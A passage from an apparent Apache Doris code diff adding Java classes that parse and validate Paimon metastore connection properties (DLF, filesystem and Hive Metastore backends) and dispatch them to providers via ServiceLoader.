fail-fast: {@code warehouse} is required by every paimon flavor (legacy parity). */ + protected void requireWarehouse() { + if (StringUtils.isBlank(warehouse)) { + throw new IllegalArgumentException("Property warehouse is required."); + } + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/JdbcDriverSupport.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/JdbcDriverSupport.java new file mode 100644 index 00000000000000..176763295a3d3e --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/JdbcDriverSupport.java @@ -0,0 +1,63 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi; + +import org.apache.commons.lang3.StringUtils; + +import java.util.Map; + +/** + * Shared JDBC driver-url resolution. Only the PURE resolver lives here (a function of the raw + * {@code driver_url} + the engine environment map). The live driver REGISTRATION + * ({@code DriverManager.registerDriver} + the {@code DriverShim} + the class-loader cache) is a JVM + * side-effect with no caller until the paimon adapter cuts over (P2-T03), so it is intentionally NOT + * moved here yet (Rule 2: no speculative dead code). + */ +public final class JdbcDriverSupport { + + private JdbcDriverSupport() { + } + + /** + * Resolves a JDBC {@code driver_url} to a full, scheme-bearing URL string. A value already + * carrying a scheme ({@code "://"}) is used as-is; an absolute path (starting with {@code "/"}) is + * returned unchanged; otherwise it is treated as a bare jar file name and resolved against the + * engine's configured {@code jdbc_drivers_dir} (defaulting to + * {@code $DORIS_HOME/plugins/jdbc_drivers}). Mirrors the minimal {@code JdbcResource.getFullDriverUrl} + * resolution (no file-existence / legacy old-dir / cloud-download handling), so the FE driver + * registration and the BE-bound options resolve a given {@code driver_url} identically. + * + * @param driverUrl the raw driver_url; must be non-null and non-blank (the caller's responsibility) + * @param env the engine environment map (e.g. {@code jdbc_drivers_dir}, {@code doris_home}); never null + */ + public static String resolveDriverUrl(String driverUrl, Map env) { + if (driverUrl.contains("://")) { + return driverUrl; + } + if (driverUrl.startsWith("/")) { + // Absolute path, no scheme: legacy returns it as-is (no driversDir prepend). + return driverUrl; + } + String driversDir = env.get("jdbc_drivers_dir"); + if (StringUtils.isBlank(driversDir)) { + String dorisHome = env.getOrDefault("doris_home", "."); + driversDir = dorisHome + "/plugins/jdbc_drivers"; + } + return "file://" + driversDir + "/" + driverUrl; + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreParseUtils.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreParseUtils.java new file mode 100644 index 00000000000000..6732de4909de07 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreParseUtils.java @@ -0,0 +1,121 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi; + +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; + +import org.apache.commons.lang3.StringUtils; + +import java.lang.reflect.Field; +import java.util.LinkedHashMap; +import java.util.Map; +import java.util.function.BiConsumer; + +/** + * Neutral parse helpers shared by the metastore backend parsers. All methods are pure functions of + * the input maps and hold no Hadoop/SDK state, keeping this module hadoop/fs-free (DV-007). Ported + * from the paimon connector's hand-copied helpers (the up-move source). + */ +public final class MetaStoreParseUtils { + + /** + * The backend dispatch signal each {@link MetaStoreProvider} self-identifies on. This is the + * paimon connector's key (the up-move source); the SPI is paimon-sourced for now (a generic + * hive/iceberg detector could broaden the signal later — out of P2-T02 scope). + */ + public static final String CATALOG_TYPE_KEY = "paimon.catalog.type"; + + /** Hadoop S3A standard prefix (legacy {@code AbstractPaimonProperties.FS_S3A_PREFIX}). */ + public static final String FS_S3A_PREFIX = "fs.s3a."; + + /** + * User storage prefixes re-keyed onto {@link #FS_S3A_PREFIX} during the storage overlay + * (legacy {@code AbstractPaimonProperties.userStoragePrefixes}). + */ + public static final String[] USER_STORAGE_PREFIXES = { + "paimon.s3.", "paimon.s3a.", "paimon.fs.s3.", "paimon.fs.oss."}; + + private MetaStoreParseUtils() { + } + + /** + * Returns the first non-blank value among the given keys, or {@code null} if none is set. + * Mirrors the alias-priority semantics of {@code @ConnectorProperty(names=...)}. + */ + public static String firstNonBlank(Map props, String... keys) { + for (String key : keys) { + String value = props.get(key); + if (StringUtils.isNotBlank(value)) { + return value; + } + } + return null; + } + + /** Emits {@code (key, props.get(key))} to {@code setter} when the value is present and non-blank. */ + public static void copyIfPresent(Map props, String key, BiConsumer setter) { + String value = props.get(key); + if (StringUtils.isNotBlank(value)) { + setter.accept(key, value); + } + } + + /** Returns {@code ""} for a null input, otherwise the input unchanged. */ + public static String nullToEmpty(String s) { + return s == null ? "" : s; + } + + /** + * Two-step storage overlay (legacy {@code AbstractPaimonProperties} precedence order): first the + * pre-computed canonical object-store config, then the original + * {@code paimon.s3./s3a./fs.s3./fs.oss.} re-key plus raw {@code fs./dfs./hadoop.} passthrough, + * which run LAST and overlay the canonical translation (last-write-wins). HDFS is absent from + * {@code storageHadoopConfig} and reaches the conf via the raw passthrough. + */ + public static void applyStorageConfig(Map storageHadoopConfig, + Map props, BiConsumer setter) { + storageHadoopConfig.forEach(setter); + props.forEach((key, value) -> { + for (String prefix : USER_STORAGE_PREFIXES) { + if (key.startsWith(prefix)) { + setter.accept(FS_S3A_PREFIX + key.substring(prefix.length()), value); + return; // stop after the first matching prefix (legacy normalizeS3Config) + } + } + if (key.startsWith("fs.") || key.startsWith("dfs.") || key.startsWith("hadoop.")) { + setter.accept(key, value); + } + }); + } + + /** + * The subset of {@code raw} actually matched by the {@code @ConnectorProperty} aliases declared on + * {@code holder} (first-alias-wins, preserving declaration order). Backs + * {@code MetaStoreProperties.matchedProperties()}. + */ + public static Map matchedProperties(Object holder, Map raw) { + Map matched = new LinkedHashMap<>(); + for (Field field : ConnectorPropertiesUtils.getConnectorProperties(holder.getClass())) { + String name = ConnectorPropertiesUtils.getMatchedPropertyName(field, raw); + if (name != null) { + matched.put(name, raw.get(name)); + } + } + return matched; + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreProvider.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreProvider.java new file mode 100644 index 00000000000000..f669ee11d6ac90 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreProvider.java @@ -0,0 +1,74 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi; + +import org.apache.doris.connector.metastore.MetaStoreProperties; +import org.apache.doris.extension.spi.Plugin; +import org.apache.doris.extension.spi.PluginFactory; + +import java.util.Collections; +import java.util.Map; +import java.util.Set; + +/** + * Backend discovery SPI for metastore connection properties — the metastore-side counterpart of + * fe-filesystem's {@code FileSystemProvider}. Adding a backend = a new provider + one line in + * {@code META-INF/services}; the API/SPI need no change and there is no central {@code switch} + * (D-006). + * + *

    A provider self-identifies via {@link #supports(Map)} (reads a cheap, deterministic signal + * such as {@code paimon.catalog.type}) and, when selected, parses the raw properties into its typed + * {@link MetaStoreProperties} facts via {@link #bind(Map, Map)}. Discovery is via + * {@link java.util.ServiceLoader}; a catalog has exactly one metastore, so the dispatcher + * ({@link MetaStoreProviders#bind}) selects the FIRST supporting provider. + * + * @param

    the concrete {@link MetaStoreProperties} subtype produced + */ +public interface MetaStoreProvider

    extends PluginFactory { + + /** Cheap, deterministic self-identification (e.g. reads {@code paimon.catalog.type}). */ + boolean supports(Map properties); + + /** + * Parses the raw properties (plus a pre-computed neutral storage Hadoop-config map, used by the + * backends whose {@link MetaStoreProperties#needsStorage()} is true to overlay storage into the + * conf in the parity-critical order) into the typed facts. + * + * @param properties the raw CREATE-CATALOG properties + * @param storageHadoopConfig the canonical object-store Hadoop config (may be empty; never null), + * pre-computed by the FE/connector from the bound storage properties; + * kept neutral so this module stays hadoop/fs-free (DV-007) + */ + P bind(Map properties, Map storageHadoopConfig); + + /** Alias keys of sensitive properties (for masking in logs); empty by default. */ + default Set sensitivePropertyKeys() { + return Collections.emptySet(); + } + + @Override + default String name() { + return getClass().getSimpleName().replace("MetaStoreProvider", ""); + } + + @Override + default Plugin create() { + throw new UnsupportedOperationException( + "MetaStoreProvider does not support no-arg create(); use bind(Map, Map) instead."); + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreProviders.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreProviders.java new file mode 100644 index 00000000000000..93675220710806 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/MetaStoreProviders.java @@ -0,0 +1,71 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi; + +import org.apache.doris.connector.metastore.MetaStoreProperties; + +import java.util.ArrayList; +import java.util.List; +import java.util.Map; +import java.util.ServiceLoader; +import java.util.stream.Collectors; + +/** + * Dispatches a raw property map to the first {@link MetaStoreProvider} that + * {@link MetaStoreProvider#supports(Map) supports} it (a catalog has exactly one metastore), mirroring + * the first-hit semantics of {@code FileSystemPluginManager.createFileSystem}. Providers are + * discovered via {@link ServiceLoader} (the {@code META-INF/services} entries), so there is no + * central {@code switch} and no per-backend enum (D-006). + */ +public final class MetaStoreProviders { + + private static final List PROVIDERS = load(); + + private MetaStoreProviders() { + } + + private static List load() { + List list = new ArrayList<>(); + ServiceLoader.load(MetaStoreProvider.class).forEach(list::add); + return list; + } + + /** + * Binds {@code properties} to the typed facts of the first supporting backend. + * + * @param properties the raw CREATE-CATALOG properties + * @param storageHadoopConfig the pre-computed neutral storage Hadoop config (may be empty; never null) + * @return the bound {@link MetaStoreProperties} + * @throws IllegalArgumentException if no registered provider supports {@code properties} + */ + public static MetaStoreProperties bind(Map properties, + Map storageHadoopConfig) { + for (MetaStoreProvider provider : PROVIDERS) { + if (provider.supports(properties)) { + return provider.bind(properties, storageHadoopConfig); + } + } + throw new IllegalArgumentException( + "No MetaStoreProvider supports the given properties; registered providers: " + registeredNames()); + } + + /** Names of the registered providers (for diagnostics). */ + public static List registeredNames() { + return PROVIDERS.stream().map(MetaStoreProvider::name).collect(Collectors.toList()); + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/dlf/DlfMetaStorePropertiesImpl.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/dlf/DlfMetaStorePropertiesImpl.java new file mode 100644 index 00000000000000..74857ac5e279ca --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/dlf/DlfMetaStorePropertiesImpl.java @@ -0,0 +1,156 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi.dlf; + +import org.apache.doris.connector.metastore.DlfMetaStoreProperties; +import org.apache.doris.connector.metastore.spi.AbstractMetaStoreProperties; +import org.apache.doris.connector.metastore.spi.MetaStoreParseUtils; +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; +import org.apache.doris.foundation.property.ConnectorProperty; + +import org.apache.commons.lang3.BooleanUtils; +import org.apache.commons.lang3.StringUtils; + +import java.util.LinkedHashMap; +import java.util.Map; + +/** + * Aliyun DLF metastore backend facts: the 8 {@code dlf.catalog.*} keys with endpoint-from-region + * derivation and {@code catalogId}←{@code uid} fallback (legacy + * {@code AliyunDLFBaseProperties}/{@code PaimonAliyunDLFMetaStoreProperties}), overlaid with the OSS + * storage config. {@link #needsStorage()} is true and an OSS storage key is required. + */ +public final class DlfMetaStorePropertiesImpl extends AbstractMetaStoreProperties + implements DlfMetaStoreProperties { + + @ConnectorProperty(names = {"dlf.access_key", "dlf.catalog.accessKeyId"}, required = false, sensitive = true, + description = "DLF access key id.") + private String accessKey = ""; + + @ConnectorProperty(names = {"dlf.secret_key", "dlf.catalog.accessKeySecret"}, required = false, sensitive = true, + description = "DLF access key secret.") + private String secretKey = ""; + + @ConnectorProperty(names = {"dlf.session_token", "dlf.catalog.sessionToken"}, required = false, sensitive = true, + description = "DLF session/security token.") + private String sessionToken = ""; + + @ConnectorProperty(names = {"dlf.region"}, required = false, + description = "DLF region (used to derive the endpoint when the endpoint is not set).") + private String region = ""; + + @ConnectorProperty(names = {"dlf.endpoint", "dlf.catalog.endpoint"}, required = false, + description = "DLF endpoint.") + private String endpoint = ""; + + @ConnectorProperty(names = {"dlf.catalog.uid", "dlf.uid"}, required = false, + description = "DLF account uid.") + private String uid = ""; + + @ConnectorProperty(names = {"dlf.catalog.id", "dlf.catalog_id"}, required = false, + description = "DLF catalog id (defaults to the uid).") + private String catalogId = ""; + + @ConnectorProperty(names = {"dlf.access.public", "dlf.catalog.accessPublic"}, required = false, + description = "Whether to use the public DLF endpoint (vs the VPC endpoint).") + private String accessPublic = "false"; + + @ConnectorProperty(names = {"dlf.catalog.proxyMode", "dlf.proxy.mode"}, required = false, + description = "DLF proxy mode.") + private String proxyMode = "DLF_ONLY"; + + private final Map storageHadoopConfig; + + private DlfMetaStorePropertiesImpl(Map raw, Map storageHadoopConfig) { + super(raw); + this.storageHadoopConfig = storageHadoopConfig; + } + + public static DlfMetaStorePropertiesImpl of(Map raw, Map storageHadoopConfig) { + DlfMetaStorePropertiesImpl props = new DlfMetaStorePropertiesImpl(raw, storageHadoopConfig); + ConnectorPropertiesUtils.bindConnectorProperties(props, raw); + return props; + } + + @Override + public String providerName() { + return "DLF"; + } + + @Override + public boolean needsStorage() { + return true; + } + + @Override + public void validate() { + requireWarehouse(); + if (StringUtils.isBlank(accessKey)) { + throw new IllegalArgumentException("dlf.access_key is required"); + } + if (StringUtils.isBlank(secretKey)) { + throw new IllegalArgumentException("dlf.secret_key is required"); + } + // Fail-fast mirror of the endpoint-from-region derivation: if both are blank we cannot derive. + if (StringUtils.isBlank(endpoint) && StringUtils.isBlank(region)) { + throw new IllegalArgumentException("dlf.endpoint is required."); + } + // OSS storage is required for a DLF catalog (legacy selected StorageProperties of OSS/OSS_HDFS at + // init; here we key off the user's OSS prefixes). Outcome-equivalent rejection + same message. + requireOssStorage(); + } + + @Override + public Map toDlfCatalogConf() { + String resolvedEndpoint = endpoint; + if (StringUtils.isBlank(resolvedEndpoint) && StringUtils.isNotBlank(region)) { + resolvedEndpoint = BooleanUtils.toBoolean(accessPublic) + ? "dlf." + region + ".aliyuncs.com" + : "dlf-vpc." + region + ".aliyuncs.com"; + } + if (StringUtils.isBlank(resolvedEndpoint)) { + throw new IllegalStateException("dlf.endpoint is required."); + } + String resolvedCatalogId = StringUtils.isBlank(catalogId) ? uid : catalogId; + + Map conf = new LinkedHashMap<>(); + conf.put("dlf.catalog.accessKeyId", MetaStoreParseUtils.nullToEmpty(accessKey)); + conf.put("dlf.catalog.accessKeySecret", MetaStoreParseUtils.nullToEmpty(secretKey)); + conf.put("dlf.catalog.endpoint", resolvedEndpoint); + conf.put("dlf.catalog.region", MetaStoreParseUtils.nullToEmpty(region)); + conf.put("dlf.catalog.securityToken", MetaStoreParseUtils.nullToEmpty(sessionToken)); + conf.put("dlf.catalog.uid", MetaStoreParseUtils.nullToEmpty(uid)); + conf.put("dlf.catalog.id", MetaStoreParseUtils.nullToEmpty(resolvedCatalogId)); + conf.put("dlf.catalog.proxyMode", proxyMode); + // Overlay the OSS storage config (legacy ossProps.getHadoopStorageConfig + appendUserHadoopConfig). + MetaStoreParseUtils.applyStorageConfig(storageHadoopConfig, raw, conf::put); + return conf; + } + + private void requireOssStorage() { + for (String key : raw.keySet()) { + if (key.startsWith("oss.") || key.startsWith("fs.oss.") || key.startsWith("paimon.fs.oss.")) { + return; + } + } + // IllegalArgumentException (not legacy's IllegalStateException) to keep validate() uniform with the + // other fail-fast rules; the message is byte-identical to legacy and the framework wraps both the + // same way. (toDlfCatalogConf's blank-endpoint guard keeps ISE to match buildDlfHiveConf.) + throw new IllegalArgumentException("Paimon DLF metastore requires OSS storage properties."); + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/dlf/DlfMetaStoreProvider.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/dlf/DlfMetaStoreProvider.java new file mode 100644 index 00000000000000..bf661bf43d0ee3 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/dlf/DlfMetaStoreProvider.java @@ -0,0 +1,50 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi.dlf; + +import org.apache.doris.connector.metastore.DlfMetaStoreProperties; +import org.apache.doris.connector.metastore.spi.MetaStoreParseUtils; +import org.apache.doris.connector.metastore.spi.MetaStoreProvider; +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; + +import java.util.Map; +import java.util.Set; + +/** Selects the Aliyun DLF backend ({@code paimon.catalog.type == dlf}). */ +public final class DlfMetaStoreProvider implements MetaStoreProvider { + + @Override + public boolean supports(Map properties) { + return "dlf".equalsIgnoreCase(properties.get(MetaStoreParseUtils.CATALOG_TYPE_KEY)); + } + + @Override + public DlfMetaStoreProperties bind(Map properties, Map storageHadoopConfig) { + return DlfMetaStorePropertiesImpl.of(properties, storageHadoopConfig); + } + + @Override + public Set sensitivePropertyKeys() { + return ConnectorPropertiesUtils.getSensitiveKeys(DlfMetaStorePropertiesImpl.class); + } + + @Override + public String name() { + return "DLF"; + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/fs/FileSystemMetaStorePropertiesImpl.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/fs/FileSystemMetaStorePropertiesImpl.java new file mode 100644 index 00000000000000..90ce2f4137c4ba --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/fs/FileSystemMetaStorePropertiesImpl.java @@ -0,0 +1,63 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi.fs; + +import org.apache.doris.connector.metastore.FileSystemMetaStoreProperties; +import org.apache.doris.connector.metastore.spi.AbstractMetaStoreProperties; +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; + +import java.util.Map; + +/** + * Filesystem (warehouse-only) metastore backend facts. The storage config is overlaid by the + * connector at catalog-build time, so this impl carries only the warehouse and declares + * {@link #needsStorage()} true. + */ +public final class FileSystemMetaStorePropertiesImpl extends AbstractMetaStoreProperties + implements FileSystemMetaStoreProperties { + + private FileSystemMetaStorePropertiesImpl(Map raw) { + super(raw); + } + + public static FileSystemMetaStorePropertiesImpl of(Map raw) { + FileSystemMetaStorePropertiesImpl props = new FileSystemMetaStorePropertiesImpl(raw); + ConnectorPropertiesUtils.bindConnectorProperties(props, raw); + return props; + } + + @Override + public String providerName() { + return "FILESYSTEM"; + } + + @Override + public boolean needsStorage() { + return true; + } + + @Override + public void validate() { + requireWarehouse(); + } + + @Override + public String getWarehouse() { + return warehouse; + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/fs/FileSystemMetaStoreProvider.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/fs/FileSystemMetaStoreProvider.java new file mode 100644 index 00000000000000..de0c8688da1e57 --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/fs/FileSystemMetaStoreProvider.java @@ -0,0 +1,52 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi.fs; + +import org.apache.doris.connector.metastore.FileSystemMetaStoreProperties; +import org.apache.doris.connector.metastore.spi.MetaStoreParseUtils; +import org.apache.doris.connector.metastore.spi.MetaStoreProvider; + +import java.util.Map; + +/** + * Selects the filesystem backend: the default when {@code paimon.catalog.type} is absent/blank, or + * an explicit {@code filesystem}. + */ +public final class FileSystemMetaStoreProvider implements MetaStoreProvider { + + @Override + public boolean supports(Map properties) { + // Default backend: the catalog-type key is ABSENT, or an explicit "filesystem". A present-but-other + // value (incl. blank/whitespace) is NOT claimed here so it falls through to the dispatcher's + // no-supporter throw, matching legacy's reject-on-unknown (no .trim(), consistent with the other + // providers' plain equalsIgnoreCase). + String type = properties.get(MetaStoreParseUtils.CATALOG_TYPE_KEY); + return type == null || "filesystem".equalsIgnoreCase(type); + } + + @Override + public FileSystemMetaStoreProperties bind(Map properties, + Map storageHadoopConfig) { + return FileSystemMetaStorePropertiesImpl.of(properties); + } + + @Override + public String name() { + return "FILESYSTEM"; + } +} diff --git a/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesImpl.java b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesImpl.java new file mode 100644 index 00000000000000..28a04ad5c9edea --- /dev/null +++ b/fe/fe-connector/fe-connector-metastore-spi/src/main/java/org/apache/doris/connector/metastore/spi/hms/HmsMetaStorePropertiesImpl.java @@ -0,0 +1,210 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.metastore.spi.hms; + +import org.apache.doris.connector.metastore.HmsMetaStoreProperties; +import org.apache.doris.connector.metastore.spi.AbstractMetaStoreProperties; +import org.apache.doris.connector.metastore.spi.MetaStoreParseUtils; +import org.apache.doris.foundation.property.ConnectorPropertiesUtils; +import org.apache.doris.foundation.property.ConnectorProperty; +import org.apache.doris.kerberos.AuthType; +import org.apache.doris.kerberos.KerberosAuthSpec; + +import org.apache.commons.lang3.StringUtils; + +import java.util.LinkedHashMap; +import java.util.Map; +import java.util.Optional; + +/** + * Hive Metastore (HMS) backend facts. {@link #toHiveConfOverrides()} produces the neutral key map the + * connector layers onto its own {@code HiveConf} (the connector seeds {@code new HiveConf()} + + * {@code hive.conf.resources} first, then applies these overrides). Ported faithfully from the paimon + * connector's {@code buildHmsHiveConf} (the up-move source), whose ordering is load-bearing: the + * storage overlay runs BEFORE the kerberos block so a raw {@code hadoop.security.authentication=simple} + * passthrough cannot clobber the forced {@code kerberos}. + * + *

    The real {@code UGI.doAs} is performed FE-side via {@code ConnectorContext.executeAuthenticated}; + * this impl only carries facts ({@link #getAuthType()}, {@link #kerberos()}, neutral string keys), so + * no hadoop authenticator code is needed here (DV-006). + */ +public final class HmsMetaStorePropertiesImpl extends AbstractMetaStoreProperties + implements HmsMetaStoreProperties { + + @ConnectorProperty(names = {"hive.metastore.uris", "uri"}, required = false, + description = "The hive metastore thrift URI.") + private String uri = ""; + + // Default "" (NOT "none"): emit-when-present parity (legacy copyIfPresent only sets it when the raw + // key is present); the kerberos branch below treats blank as "none" via getOrDefault semantics. + @ConnectorProperty(names = {"hive.metastore.authentication.type"}, required = false, + description = "The hive metastore authentication type.") + private String authType = ""; + + @ConnectorProperty(names = {"hive.metastore.client.principal"}, required = false, + description = "The client principal of the hive metastore.") + private String clientPrincipal = ""; + + @ConnectorProperty(names = {"hive.metastore.client.keytab"}, required = false, sensitive = true, + description = "The client keytab of the hive metastore.") + private String clientKeytab = ""; + + @ConnectorProperty(names = {"hadoop.security.authentication"}, required = false, + description = "The HDFS authentication type (kerberos fallback).") + private String hdfsAuthType = ""; + + @ConnectorProperty(names = {"hadoop.kerberos.principal"}, required = false, + description = "The HDFS kerberos principal (kerberos fallback).") + private String hdfsKerberosPrincipal = ""; + + @ConnectorProperty(names = {"hadoop.kerberos.keytab"}, required = false, sensitive = true, + description = "The HDFS kerberos keytab (kerberos fallback).") + private String hdfsKerberosKeytab = ""; + + @ConnectorProperty(names = {"hive.metastore.service.principal", "hive.metastore.kerberos.principal"}, + required = false, description = "The hive metastore service principal.") + private String servicePrincipal = ""; + + @ConnectorProperty(names = {"hive.metastore.username", "hadoop.username"}, required = false, + description = "The user name for the hive metastore service.") + private String userName = ""; + + private final Map storageHadoopConfig; + + private HmsMetaStorePropertiesImpl(Map raw, Map storageHadoopConfig) { + super(raw); + this.storageHadoopConfig = storageHadoopConfig; + } + + public static HmsMetaStorePropertiesImpl of(Map raw, Map storageHadoopConfig) { + HmsMetaStorePropertiesImpl props = new HmsMetaStorePropertiesImpl(raw, storageHadoopConfig); + ConnectorPropertiesUtils.bindConnectorProperties(props, raw); + return props; + } + + @Override + public String providerName() { + return "HMS"; + } + + @Override + public boolean needsStorage() { + return true; + } + + @Override + public void validate() { + requireWarehouse(); + if (StringUtils.isBlank(uri)) { + throw new IllegalArgumentException("hive.metastore.uris or uri is required"); + } + // forbidIf(authType, "simple", {clientPrincipal, clientKeytab}) — legacy HMSBaseProperties.buildRules + // uses CASE-SENSITIVE Objects.equals (the paimon hand-copy omits this rule; restored here — D-4). + if ("simple".equals(authType) + && (StringUtils.isNotBlank(clientPrincipal) || StringUtils.isNotBlank(clientKeytab))) { + throw new IllegalArgumentException( + "hive.metastore.client.principal 